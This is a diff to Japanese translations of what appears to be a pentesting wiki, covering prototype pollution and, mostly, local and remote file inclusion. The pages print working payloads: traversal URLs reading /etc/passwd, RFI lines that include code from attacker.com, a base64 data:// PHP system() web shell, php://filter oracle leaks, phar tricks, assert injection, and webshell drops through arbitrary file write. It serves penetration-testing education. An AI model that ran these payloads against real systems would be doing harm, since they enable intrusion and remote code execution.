 ### プロトタイプ汚染を検出するためのツール
 
-- [**Server-Side-Prototype-Pollution-Gadgets-Scanner**](https://github.com/doyensec/Server-Side-Prototype-Pollution-Gadgets-Scanner): ウェブアプリケーションにおけるサーバーサイドのプロトタイプ汚染脆弱性を検出および分析するために設計されたBurp Suite拡張機能。このツールは、リクエストをスキャンして潜在的なプロトタイプ汚染の問題を特定するプロセスを自動化します。既知のガジェット - プロトタイプ汚染を利用して有害なアクションを実行する方法 - を悪用し、特にNode.jsライブラリに焦点を当てています。
+- [**Server-Side-Prototype-Pollution-Gadgets-Scanner**](https://github.com/doyensec/Server-Side-Prototype-Pollution-Gadgets-Scanner): ウェブアプリケーションにおけるサーバーサイドのプロトタイプ汚染脆弱性を検出し分析するために設計されたBurp Suite拡張機能。このツールは、リクエストをスキャンして潜在的なプロトタイプ汚染の問題を特定するプロセスを自動化します。既知のガジェット - プロトタイプ汚染を利用して有害なアクションを実行する方法 - を悪用し、特にNode.jsライブラリに焦点を当てています。
 - [**server-side-prototype-pollution**](https://github.com/portswigger/server-side-prototype-pollution): この拡張機能は、サーバーサイドのプロトタイプ汚染脆弱性を特定します。[サーバーサイドプロトタイプ汚染](https://portswigger.net/research/server-side-prototype-pollution)で説明されている技術を使用しています。
 
 ### NodeJSにおけるASTプロトタイプ汚染
@@ -250,7 +252,7 @@ Handlebarsテンプレートエンジンは、プロトタイプ汚染攻撃に
 悪用は、Handlebarsによって生成されたAST(抽象構文木)を利用し、以下の手順に従います:
 
 1. **パーサーの操作**: 最初に、`NumberLiteral`ノードを介してパーサーは値が数値であることを強制します。プロトタイプ汚染はこれを回避でき、非数値の文字列を挿入することが可能になります。
-2. **コンパイラによる処理**: コンパイラはASTオブジェクトまたは文字列テンプレートを処理できます。`input.type`が`Program`に等しい場合、入力は事前に解析されたものとして扱われ、悪用される可能性があります。
+2. **コンパイラによる処理**: コンパイラはASTオブジェクトまたは文字列テンプレートを処理できます。`input.type`が`Program`に等しい場合、入力は事前に解析されたものとして扱われ、これを悪用できます。
 3. **コードの注入**: `Object.prototype`の操作を通じて、テンプレート関数に任意のコードを注入でき、リモートコード実行につながる可能性があります。
 
 Handlebarsの脆弱性を悪用する例:
@@ -315,7 +317,7 @@ requests.get(TARGET_URL)
 ```
 #### Pugの脆弱性
 
-Pugは、別のテンプレートエンジンであり、プロトタイプ汚染の同様のリスクに直面しています。詳細な情報は、[AST Injection in Pug](https://blog.p6.is/AST-Injection/#Pug)の議論で入手できます。
+Pugは、別のテンプレートエンジンであり、プロトタイプ汚染の同様のリスクに直面しています。詳細情報は、[AST Injection in Pug](https://blog.p6.is/AST-Injection/#Pug)の議論で入手できます。
 
 Pugにおけるプロトタイプ汚染の例:
 ```python
@@ -345,7 +347,7 @@ requests.get(TARGET_URL)
 5. **Mapの使用**: キーと値のペアを保存するために`Object`の代わりに`Map`を使用すべきです。
 6. **ライブラリの更新**: 定期的にライブラリを更新することでセキュリティパッチを組み込むことができます。
 7. **リンターと静的解析ツール**: プロトタイプ汚染の脆弱性を検出し防止するために、適切なプラグインを持つESLintのようなツールを使用します。
-8. **コードレビュー**: プロトタイプ汚染に関連する潜在的なリスクを特定し修正するために、徹底的なコードレビューを実施します。
+8. **コードレビュー**: プロトタイプ汚染に関連する潜在的なリスクを特定し修正するために徹底的なコードレビューを実施します。
 9. **セキュリティトレーニング**: 開発者にプロトタイプ汚染のリスクと安全なコードを書くためのベストプラクティスについて教育します。
 10. **ライブラリの使用に注意**: サードパーティのライブラリを使用する際は注意が必要です。セキュリティの姿勢を評価し、特にオブジェクトを操作するコードをレビューします。
 11. **ランタイム保護**: プロトタイプ汚染攻撃を検出し防止できるセキュリティ重視のnpmパッケージを使用するなど、ランタイム保護メカニズムを採用します。
diff --git a/src/pentesting-web/file-inclusion/README.md b/src/pentesting-web/file-inclusion/README.md
index d43d1a75b..17f08052a 100644
--- a/src/pentesting-web/file-inclusion/README.md
+++ b/src/pentesting-web/file-inclusion/README.md
@@ -4,10 +4,10 @@
 
 ## ファイルインクルージョン
 
-**リモートファイルインクルージョン (RFI):** ファイルはリモートサーバーから読み込まれます(最良: コードを書いてサーバーがそれを実行します)。PHPでは、これはデフォルトで**無効**です(**allow_url_include**)。\
-**ローカルファイルインクルージョン (LFI):** サーバーはローカルファイルを読み込みます。
+**リモートファイルインクルージョン (RFI):** ファイルはリモートサーバーからロードされます(最良: コードを書いてサーバーがそれを実行します)。PHPでは、これは**デフォルトで無効**です(**allow_url_include**)。\
+**ローカルファイルインクルージョン (LFI):** サーバーはローカルファイルをロードします。
 
-脆弱性は、ユーザーがサーバーによって読み込まれるファイルを何らかの方法で制御できるときに発生します。
+脆弱性は、ユーザーがサーバーによってロードされるファイルを何らかの方法で制御できるときに発生します。
 
 脆弱な**PHP関数**: require, require_once, include, include_once
 
@@ -19,7 +19,8 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
 ```
 ### **Linux**
 
-**複数の*nix LFIリストを混ぜて、さらにパスを追加してこれを作成しました:**
+**複数の*nix LFIリストを混ぜて、さらにパスを追加して作成したものです:**
+
 
 {{#ref}}
 https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt
@@ -28,12 +29,13 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion
 `/`を`\`に変更してみてください。\
 `../../../../../`を追加してみてください。
 
-ファイル/etc/passwordを見つけるためにいくつかの技術を使用したリスト(脆弱性が存在するか確認するため)は[こちら](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)にあります。
+ファイル/etc/passwordを見つけるためにいくつかの技術を使用したリスト(脆弱性が存在するか確認するため)は[こちら](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)で見つけることができます。
 
 ### **Windows**
 
 異なるワードリストのマージ:
 
+
 {{#ref}}
 https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt
 {{#endref}}
@@ -41,7 +43,7 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion
 `/`を`\`に変更してみてください。\
 `C:/`を削除して`../../../../../`を追加してみてください。
 
-ファイル/boot.iniを見つけるためにいくつかの技術を使用したリスト(脆弱性が存在するか確認するため)は[こちら](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)にあります。
+ファイル/boot.iniを見つけるためにいくつかの技術を使用したリスト(脆弱性が存在するか確認するため)は[こちら](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)で見つけることができます。
 
 ### **OS X**
 
@@ -49,7 +51,7 @@ LinuxのLFIリストを確認してください。
 
 ## 基本的なLFIとバイパス
 
-すべての例はローカルファイルインクルージョン用ですが、リモートファイルインクルージョンにも適用できます(ページ=[http://myserver.com/phpshellcode.txt\\](/))。
+すべての例はローカルファイルインクルージョン用ですが、リモートファイルインクルージョンにも適用できます(ページ=[http://myserver.com/phpshellcode.txt\\](/>))。
 ```
 http://example.com/index.php?page=../../../etc/passwd
 ```
@@ -61,7 +63,7 @@ http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
 ```
 ### **ヌルバイト (%00)**
 
-提供された文字列の末尾にさらに文字を追加するのをバイパスします(バイパス: $\_GET\['param']."php")
+提供された文字列の末尾に文字を追加するのをバイパスします(バイパス: $\_GET\['param']."php")
 ```
 http://example.com/index.php?page=../../../etc/passwd%00
 ```
@@ -84,7 +86,7 @@ http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
 ```
 ### サーバー上のファイルシステムディレクトリの探索
 
-サーバーのファイルシステムは、特定の技術を用いてファイルだけでなくディレクトリを特定するために再帰的に探索できます。このプロセスは、ディレクトリの深さを決定し、特定のフォルダの存在を探ることを含みます。以下は、これを達成するための詳細な方法です:
+サーバーのファイルシステムは、特定の技術を用いてファイルだけでなくディレクトリを特定するために再帰的に探索できます。このプロセスには、ディレクトリの深さを決定し、特定のフォルダの存在を探ることが含まれます。以下は、これを達成するための詳細な方法です:
 
 1. **ディレクトリの深さを決定する:** 現在のディレクトリの深さを確認するために、`/etc/passwd`ファイルを正常に取得します(サーバーがLinuxベースの場合に適用)。例として、深さが3であることを示すURLは次のように構成されるかもしれません:
 ```bash
@@ -97,7 +99,7 @@ http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=
 3. **結果の解釈:** サーバーの応答はフォルダーの存在を示します:
 - **エラー / 出力なし:** フォルダー `private` は指定された場所に存在しない可能性が高いです。
 - **`/etc/passwd` の内容:** `private` フォルダーの存在が確認されました。
-4. **再帰的探索:** 発見されたフォルダーは、同じ技術や従来のローカルファイルインクルージョン (LFI) メソッドを使用して、サブディレクトリやファイルをさらに調査できます。
+4. **再帰的探索:** 発見されたフォルダーは、同じ技術または従来のローカルファイルインクルージョン (LFI) メソッドを使用して、サブディレクトリやファイルをさらに調査できます。
 
 ファイルシステム内の異なる場所にあるディレクトリを探索するには、ペイロードを適宜調整してください。たとえば、`/var/www/` に `private` ディレクトリが含まれているか確認するには(現在のディレクトリが深さ3にあると仮定して)、次のようにします:
 ```bash
@@ -105,7 +107,7 @@ http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
 ```
 ### **パストランケーション技術**
 
-Path truncationは、ウェブアプリケーションにおけるファイルパスを操作するために使用される手法です。これは、ファイルパスの末尾に追加の文字を付加する特定のセキュリティ対策を回避することで、制限されたファイルにアクセスするためにしばしば使用されます。目的は、セキュリティ対策によって変更された場合でも、望ましいファイルを指すファイルパスを作成することです。
+Path truncationは、ウェブアプリケーションにおけるファイルパスを操作するために使用される手法です。これは、ファイルパスの末尾に追加の文字を付加する特定のセキュリティ対策を回避することによって、制限されたファイルにアクセスするためにしばしば使用されます。目的は、セキュリティ対策によって変更された場合でも、望ましいファイルを指すファイルパスを作成することです。
 
 PHPでは、ファイルシステムの性質により、ファイルパスのさまざまな表現が同等と見なされることがあります。例えば:
 
@@ -126,10 +128,10 @@ http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/pas
 これらのシナリオでは、必要なトラバーサルの数は約2027回になる可能性がありますが、この数はサーバーの設定によって異なる場合があります。
 
 - **ドットセグメントと追加文字の使用**: トラバーサルシーケンス(`../`)を追加のドットセグメントや文字と組み合わせることで、ファイルシステムをナビゲートし、サーバーによって追加された文字列を効果的に無視することができます。
-- **必要なトラバーサルの数の特定**: 試行錯誤を通じて、ルートディレクトリに移動し、その後`/etc/passwd`に移動するために必要な正確な`../`シーケンスの数を見つけることができます。これにより、追加された文字列(`.php`など)が無効化されますが、目的のパス(`/etc/passwd`)はそのまま保持されます。
-- **偽のディレクトリから始める**: 存在しないディレクトリ(`a/`など)でパスを始めるのは一般的な手法です。この技術は、予防措置として使用されるか、サーバーのパス解析ロジックの要件を満たすために使用されます。
+- **必要なトラバーサルの数を決定する**: 試行錯誤を通じて、ルートディレクトリに移動し、その後`/etc/passwd`に移動するために必要な正確な`../`シーケンスの数を見つけることができます。この際、追加された文字列(例えば`.php`)が無効化されることを確認し、目的のパス(`/etc/passwd`)がそのまま残るようにします。
+- **偽のディレクトリから始める**: 存在しないディレクトリ(例えば`a/`)でパスを始めるのは一般的な手法です。この技術は予防策として、またはサーバーのパス解析ロジックの要件を満たすために使用されます。
 
-パストランケーション技術を使用する際は、サーバーのパス解析の動作とファイルシステムの構造を理解することが重要です。各シナリオには異なるアプローチが必要な場合があり、最も効果的な方法を見つけるためにはテストがしばしば必要です。
+パストランケーション技術を使用する際は、サーバーのパス解析の挙動とファイルシステムの構造を理解することが重要です。各シナリオには異なるアプローチが必要な場合があり、最も効果的な方法を見つけるためにはテストがしばしば必要です。
 
 **この脆弱性はPHP 5.3で修正されました。**
 
@@ -143,19 +145,19 @@ http://example.com/index.php?page=PhP://filter
 ```
 ## リモートファイルインクルージョン
 
-phpでは、これはデフォルトで無効になっています。なぜなら**`allow_url_include`**が**オフ**だからです。これが**オン**でなければ機能せず、その場合、サーバーからPHPファイルをインクルードしてRCEを取得することができます。
+In php this is disable by default because **`allow_url_include`** is **Off.** It must be **On** for it to work, and in that case you could include a PHP file from your server and get RCE:
 ```python
 http://example.com/index.php?page=http://atacker.com/mal.php
 http://example.com/index.php?page=\\attacker.com\shared\mal.php
 ```
-もし何らかの理由で **`allow_url_include`** が **On** であるが、PHPが外部ウェブページへのアクセスを **フィルタリング** している場合、[この投稿](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/) によると、例えばデータプロトコルを使用してbase64でエンコードされたPHPコードをデコードし、RCEを取得することができます:
+もし何らかの理由で **`allow_url_include`** が **On** であるが、PHPが外部ウェブページへのアクセスを **フィルタリング** している場合、[この投稿](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/) によれば、例えばデータプロトコルを使用してbase64でエンコードされたPHPコードをデコードし、RCEを取得することができます:
 ```
 PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt
 ```
 > [!TIP]
-> 前のコードでは、最終的な `+.txt` が追加されました。これは攻撃者が `.txt` で終わる文字列を必要としたためで、その文字列はそれで終わり、b64 デコードの後、その部分はただのゴミを返し、実際の PHP コードが含まれ(したがって、実行されます)。
+> 前のコードでは、最終的な `+.txt` が追加されました。これは攻撃者が `.txt` で終わる文字列を必要としたためで、文字列はそれで終わり、その後の b64 デコードではその部分が無駄なデータを返し、実際の PHP コードが含まれる(したがって、実行される)ことになります。
 
-別の例は **`php://` プロトコルを使用しない** ものです:
+別の例として **`php://` プロトコルを使用しない** ものは次の通りです:
 ```
 data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt
 ```
@@ -171,17 +173,17 @@ os.path.join(os.getcwd(), "public", file_name)
 os.path.join(os.getcwd(), "public", "/etc/passwd")
 '/etc/passwd'
 ```
-これは[ドキュメント](https://docs.python.org/3.10/library/os.path.html#os.path.join)に従った意図された動作です:
+それは、[the docs](https://docs.python.org/3.10/library/os.path.html#os.path.join) によると意図された動作です:
 
 > コンポーネントが絶対パスである場合、すべての前のコンポーネントは破棄され、結合は絶対パスコンポーネントから続行されます。
 
 ## Java ディレクトリのリスト
 
-Javaでパストラバーサルがある場合、**ファイルの代わりにディレクトリを要求すると、** **ディレクトリのリストが返されます**。これは他の言語では発生しないでしょう(私の知る限りでは)。
+Javaでパストラバーサルがある場合、**ファイルの代わりにディレクトリを要求すると、** **ディレクトリのリストが返されます**。これは他の言語では発生しないでしょう(私の知る限り)。
 
 ## トップ25パラメータ
 
-ローカルファイルインクルージョン(LFI)脆弱性に対して脆弱である可能性のあるトップ25パラメータのリストです([リンク](https://twitter.com/trbughunters/status/1279768631845494787)から):
+ローカルファイルインクルージョン(LFI)脆弱性に対して脆弱である可能性のあるトップ25パラメータのリストです([link](https://twitter.com/trbughunters/status/1279768631845494787) から):
 ```
 ?cat={payload}
 ?dir={payload}
@@ -213,14 +215,14 @@ Javaでパストラバーサルがある場合、**ファイルの代わりに
 
 ### php://filter
 
-PHPフィルターは、データが読み込まれる前または書き込まれる前に基本的な**修正操作を実行**することを許可します。フィルターには5つのカテゴリがあります:
+PHPフィルターは、データが読み込まれる前または書き込まれる前に基本的な**変更操作を実行**することを許可します。フィルターには5つのカテゴリがあります:
 
 - [String Filters](https://www.php.net/manual/en/filters.string.php):
 - `string.rot13`
 - `string.toupper`
 - `string.tolower`
 - `string.strip_tags`: データからタグを削除します("<" と ">" の間のすべて)
-- このフィルターは、現代のPHPバージョンからは消えていることに注意してください
+- このフィルターは、現代のPHPバージョンからは消えたことに注意してください
 - [Conversion Filters](https://www.php.net/manual/en/filters.convert.php)
 - `convert.base64-encode`
 - `convert.base64-decode`
@@ -232,7 +234,7 @@ PHPフィルターは、データが読み込まれる前または書き込ま
 > `convert.iconv.*` 変換フィルターを悪用することで、**任意のテキストを生成**することができ、任意のテキストを記述したり、includeプロセスを任意のテキストで実行するために役立つ可能性があります。詳細については、[**LFI2RCE via php filters**](lfi2rce-via-php-filters.md)を確認してください。
 
 - [Compression Filters](https://www.php.net/manual/en/filters.compression.php)
-- `zlib.deflate`: コンテンツを圧縮します(多くの情報を抽出する場合に便利)
+- `zlib.deflate`: コンテンツを圧縮します(多くの情報を外部に出す場合に便利)
 - `zlib.inflate`: データを解凍します
 - [Encryption Filters](https://www.php.net/manual/en/filters.encryption.php)
 - `mcrypt.*` : 非推奨
@@ -273,25 +275,25 @@ readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the
 
 ### phpフィルタをオラクルとして使用して任意のファイルを読み取る
 
-[**この記事では**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle) サーバーからの出力を返さずにローカルファイルを読み取る技術が提案されています。この技術は、**phpフィルタをオラクルとして使用してファイルをブール型で抽出(文字ごとに)**することに基づいています。これは、phpフィルタを使用してテキストを大きくし、phpが例外をスローするようにするためです。
+[**この記事では**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle) サーバーからの出力を返さずにローカルファイルを読み取る技術が提案されています。この技術は、**phpフィルタをオラクルとして使用してファイルをブール的に抽出(文字ごとに)**することに基づいています。これは、phpフィルタを使用してテキストを大きくし、phpが例外をスローするようにするためです。
 
 元の記事には技術の詳細な説明がありますが、ここでは簡単な要約を示します:
 
 - コーデック **`UCS-4LE`** を使用してテキストの先頭に先行文字を残し、文字列のサイズを指数関数的に増加させます。
 - これは、**初めの文字が正しく推測されたときに非常に大きなテキストを生成するために使用され**、phpが**エラー**をトリガーします。
 - **dechunk**フィルタは、**最初の文字が16進数でない場合はすべてを削除**するため、最初の文字が16進数かどうかを知ることができます。
-- これに加えて前述のもの(および推測された文字に応じた他のフィルタ)を組み合わせることで、テキストの最初の文字を推測することができ、十分な変換を行うことでそれが16進数文字でなくなるのを確認できます。なぜなら、16進数であればdechunkはそれを削除せず、初期の爆弾がphpエラーを引き起こすからです。
-- コーデック **convert.iconv.UNICODE.CP930** は、すべての文字を次の文字に変換します(このコーデックの後:a -> b)。これにより、最初の文字が`a`であるかどうかを発見することができます。なぜなら、このコーデックを6回適用するとa->b->c->d->e->f->gとなり、その文字はもはや16進数文字ではなくなるため、dechunkはそれを削除せず、phpエラーが初期の爆弾と掛け算されてトリガーされるからです。
+- これに加えて前述のもの(および推測された文字に応じた他のフィルタ)を組み合わせることで、テキストの最初の文字を推測することができ、十分な変換を行うことでそれが16進数文字でなくなることがわかります。なぜなら、16進数であればdechunkはそれを削除せず、初期の爆弾がphpエラーを引き起こすからです。
+- コーデック **convert.iconv.UNICODE.CP930** は、すべての文字を次の文字に変換します(このコーデックの後:a -> b)。これにより、最初の文字が`a`であるかどうかを発見することができます。たとえば、6回このコーデックを適用するとa->b->c->d->e->f->gとなり、その文字はもはや16進数文字ではなくなるため、dechunkはそれを削除せず、phpエラーが初期の爆弾と掛け算されてトリガーされます。
 - **rot13**のような他の変換を最初に使用することで、n、o、p、q、rなどの他の文字を漏洩させることが可能です(他のコーデックを使用して他の文字を16進数範囲に移動させることができます)。
-- 最初の文字が数字の場合、それをbase64エンコードし、数字を漏洩させるために最初の2文字を漏洩させる必要があります。
+- 最初の文字が数字の場合、それをbase64エンコードし、最初の2文字を漏洩させて数字を漏洩させる必要があります。
 - 最後の問題は、**最初の文字以上のものを漏洩させる方法**です。**convert.iconv.UTF16.UTF-16BE、convert.iconv.UCS-4.UCS-4LE、convert.iconv.UCS-4.UCS-4LE**のような順序メモリフィルタを使用することで、文字の順序を変更し、テキストの最初の位置に他の文字を取得することが可能です。
-- さらに**データを取得する**ためのアイデアは、**最初に2バイトのジャンクデータを生成**し、**convert.iconv.UTF16.UTF16**を適用し、**UCS-4LE**を使用して**次の2バイトとピボットさせ**、**ジャンクデータまでデータを削除**することです(これにより初期テキストの最初の2バイトが削除されます)。これを繰り返して、漏洩させたいビットに到達するまで続けます。
+- さらに**データを取得する**ためのアイデアは、**最初に2バイトのジャンクデータを生成**し、**convert.iconv.UTF16.UTF16**を適用し、**UCS-4LE**を使用して次の2バイトと**ピボット**し、**ジャンクデータまでデータを削除**することです(これにより初期テキストの最初の2バイトが削除されます)。これを繰り返して、漏洩させたいビットに到達するまで続けます。
 
-この記事では、これを自動的に実行するツールも漏洩されました:[php_filters_chain_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit)。
+この記事では、この操作を自動的に実行するツールも漏洩しました:[php_filters_chain_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit)。
 
 ### php://fd
 
-このラッパーは、プロセスがオープンしているファイルディスクリプタにアクセスすることを可能にします。開いているファイルの内容を漏洩させるのに潜在的に役立ちます:
+このラッパーは、プロセスがオープンしているファイルディスクリプタにアクセスすることを可能にします。開いているファイルの内容を抽出するのに潜在的に役立ちます:
 ```php
 echo file_get_contents("php://fd/3");
 $myfile = fopen("/etc/passwd", "r");
@@ -343,7 +345,7 @@ curl -XPOST "http://example.com/index.php?page=php://input" --data "addFromString('test.txt', 'text');
 $phar->setStub('');
 $phar->stopBuffering();
 ```
-`.phar`ファイルをコンパイルするには、次のコマンドを実行する必要があります:
+`.phar`ファイルをコンパイルするには、次のコマンドを実行する必要があります:
 ```bash
 php --define phar.readonly=0 create_path.php
 ```
-実行時に `test.phar` というファイルが作成され、これを利用してローカルファイルインクルージョン (LFI) 脆弱性を悪用する可能性があります。
+実行時に、`test.phar`という名前のファイルが作成され、これを利用してローカルファイルインクルージョン(LFI)脆弱性を悪用する可能性があります。
 
-LFI が PHP コードを実行せずにファイルを読み取るだけの場合、`file_get_contents()`、`fopen()`、`file()`、`file_exists()`、`md5_file()`、`filemtime()`、または `filesize()` などの関数を通じて、デシリアライズ脆弱性の悪用を試みることができます。この脆弱性は、`phar` プロトコルを使用してファイルを読み取ることに関連しています。
+LFIがPHPコードを実行せずにファイルを読み取るだけの場合、`file_get_contents()`、`fopen()`、`file()`、`file_exists()`、`md5_file()`、`filemtime()`、または`filesize()`などの関数を通じて、デシリアライズ脆弱性の悪用を試みることができます。この脆弱性は、`phar`プロトコルを使用してファイルを読み取ることに関連しています。
 
-`.phar` ファイルのコンテキストにおけるデシリアライズ脆弱性の悪用についての詳細な理解は、以下のリンクされた文書を参照してください:
+`.phar`ファイルの文脈におけるデシリアライズ脆弱性の悪用についての詳細な理解は、以下のリンクされた文書を参照してください:
 
 [Phar Deserialization Exploitation Guide](phar-deserialization.md)
 
@@ -370,9 +372,9 @@ phar-deserialization.md
 
 ### CVE-2024-2961
 
-**php フィルターをサポートする任意のファイルを PHP から読み取ることを悪用して RCE を得ることが可能でした。** 詳細な説明は [**この投稿で見つけることができます**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**。**\
-非常に簡単な要約:PHP ヒープの **3 バイトオーバーフロー** を悪用して、特定のサイズのフリーチャンクのチェーンを **変更する** ことができ、**任意のアドレスに何でも書き込む** ことができるようになり、**`system`** を呼び出すためのフックが追加されました。\
-特定のサイズのチャンクを割り当てることが、他の PHP フィルターを悪用して可能でした。
+**phpフィルターをサポートする任意のファイルをPHPから読み取ることを悪用してRCEを得ることが可能でした。** 詳細な説明は[**この投稿で見つけることができます**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**。**\
+非常に簡単な要約:PHPヒープ内の**3バイトオーバーフロー**が悪用され、特定のサイズのフリーチャンクのチェーンを**変更する**ことができるようになり、**任意のアドレスに何でも書き込む**ことができるようになりました。そのため、**`system`**を呼び出すためのフックが追加されました。\
+特定のサイズのチャンクを割り当てることが、他のPHPフィルターを悪用して可能でした。
 
 ### さらなるプロトコル
 
@@ -380,18 +382,18 @@ phar-deserialization.md
 
 - [php://memory and php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — メモリまたは一時ファイルに書き込む(ファイルインクルージョン攻撃でどのように役立つかは不明)
 - [file://](https://www.php.net/manual/en/wrappers.file.php) — ローカルファイルシステムへのアクセス
-- [http://](https://www.php.net/manual/en/wrappers.http.php) — HTTP(S) URL へのアクセス
-- [ftp://](https://www.php.net/manual/en/wrappers.ftp.php) — FTP(S) URL へのアクセス
+- [http://](https://www.php.net/manual/en/wrappers.http.php) — HTTP(S) URLへのアクセス
+- [ftp://](https://www.php.net/manual/en/wrappers.ftp.php) — FTP(S) URLへのアクセス
 - [zlib://](https://www.php.net/manual/en/wrappers.compression.php) — 圧縮ストリーム
-- [glob://](https://www.php.net/manual/en/wrappers.glob.php) — パターンに一致するパス名を見つける(何も印刷可能なものを返さないので、ここではあまり役に立たない)
-- [ssh2://](https://www.php.net/manual/en/wrappers.ssh2.php) — セキュアシェル 2
+- [glob://](https://www.php.net/manual/en/wrappers.glob.php) — パターンに一致するパス名を見つける(何も印刷可能なものを返さないため、ここではあまり役に立たない)
+- [ssh2://](https://www.php.net/manual/en/wrappers.ssh2.php) — セキュアシェル2
 - [ogg://](https://www.php.net/manual/en/wrappers.audio.php) — オーディオストリーム(任意のファイルを読むには役に立たない)
 
-## PHP の 'assert' を介した LFI
+## PHPの'assert'によるLFI
 
-PHP におけるローカルファイルインクルージョン (LFI) リスクは、文字列内でコードを実行できる 'assert' 関数を扱う際に特に高くなります。これは、".." のようなディレクトリトラバーサル文字を含む入力がチェックされているが、適切にサニタイズされていない場合に特に問題です。
+PHPにおけるローカルファイルインクルージョン(LFI)のリスクは、文字列内でコードを実行できる'assert'関数を扱う際に特に高くなります。これは、".."のようなディレクトリトラバーサル文字を含む入力がチェックされているが、適切にサニタイズされていない場合に特に問題です。
 
-例えば、PHP コードは次のようにディレクトリトラバーサルを防ぐように設計されることがあります:
+例えば、PHPコードは次のようにディレクトリトラバーサルを防ぐように設計されることがあります:
 ```bash
 assert("strpos('$file', '..') === false") or die("");
 ```
@@ -408,7 +410,7 @@ assert("strpos('$file', '..') === false") or die("");
 ## PHP ブラインドパス トラバーサル
 
 > [!WARNING]
-> この技術は、**ファイルパス**を**制御**する**PHP関数**が**ファイルにアクセス**する場合に関連していますが、ファイルの内容は表示されません(**`file()`**への単純な呼び出しのように)が、内容は表示されません。
+> この技術は、**ファイルパス**を**制御**できる**PHP関数**が**ファイルにアクセス**する場合に関連していますが、ファイルの内容は表示されません(**`file()`**への単純な呼び出しのように)が、内容は表示されません。
 
 [**この素晴らしい投稿**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)では、ブラインドパス トラバーサルがPHPフィルターを介して**エラーオラクルを介してファイルの内容を抽出する**方法が説明されています。
 
@@ -416,7 +418,7 @@ assert("strpos('$file', '..') === false") or die("");
 
 次に、最初の文字を漏洩させるためにフィルター**`dechunk`**が使用され、**base64**や**rot13**などの他のフィルターと共に使用され、最終的にフィルター**convert.iconv.UCS-4.UCS-4LE**と**convert.iconv.UTF16.UTF-16BE**が使用されて**他の文字を最初に配置して漏洩させます**。
 
-**脆弱である可能性のある関数**: `file_get_contents`, `readfile`, `finfo->file`, `getimagesize`, `md5_file`, `sha1_file`, `hash_file`, `file`, `parse_ini_file`, `copy`, `file_put_contents (これを使用してターゲットを読み取り専用にする場合のみ)`, `stream_get_contents`, `fgets`, `fread`, `fgetc`, `fgetcsv`, `fpassthru`, `fputs`
+**脆弱である可能性のある関数**: `file_get_contents`, `readfile`, `finfo->file`, `getimagesize`, `md5_file`, `sha1_file`, `hash_file`, `file`, `parse_ini_file`, `copy`, `file_put_contents (これを使用して読み取り専用のターゲットのみ)`, `stream_get_contents`, `fgets`, `fread`, `fgetc`, `fgetcsv`, `fpassthru`, `fputs`
 
 技術的な詳細については、前述の投稿を確認してください!
 
@@ -426,16 +428,16 @@ assert("strpos('$file', '..') === false") or die("");
 
 サーバー側のコードがファイルを取り込む/アップロードする際に、ユーザー制御のデータ(例:ファイル名やURL)を使用して宛先パスを構築し、正規化や検証を行わない場合、`..`セグメントや絶対パスが意図したディレクトリを脱出し、任意のファイル書き込みを引き起こす可能性があります。ペイロードをWebに公開されたディレクトリに配置できる場合、通常はWebシェルをドロップすることで認証なしのRCEを得ることができます。
 
-典型的な悪用のワークフロー:
+典型的な悪用ワークフロー:
 - パス/ファイル名を受け入れ、ディスクにコンテンツを書き込むエンドポイントまたはバックグラウンドワーカーで書き込みプリミティブを特定します(例:メッセージ駆動の取り込み、XML/JSONコマンドハンドラー、ZIP抽出器など)。
-- Webに公開されたディレクトリを特定します。一般的な例:
+- Webに公開されたディレクトリを特定します。一般的な例:
 - Apache/PHP: `/var/www/html/`
 - Tomcat/Jetty: `/webapps/ROOT/` → `shell.jsp`をドロップ
 - IIS: `C:\inetpub\wwwroot\` → `shell.aspx`をドロップ
 - 意図したストレージディレクトリからWebルートに脱出するトラバーサルパスを作成し、Webシェルのコンテンツを含めます。
-- ドロップしたペイロードにブラウズしてコマンドを実行します。
+- ドロップしたペイロードにアクセスし、コマンドを実行します。
 
-注意:
+注意:
 - 書き込みを行う脆弱なサービスは、非HTTPポート(例:TCP 4004のJMF XMLリスナー)でリッスンしている場合があります。メインのWebポータル(異なるポート)は後でペイロードを提供します。
 - Javaスタックでは、これらのファイル書き込みは通常、単純な`File`/`Paths`の連結で実装されています。正規化/許可リストの欠如が根本的な欠陥です。
 
@@ -474,14 +476,14 @@ in.transferTo(out);
 
 ### Apache/Nginxログファイル経由
 
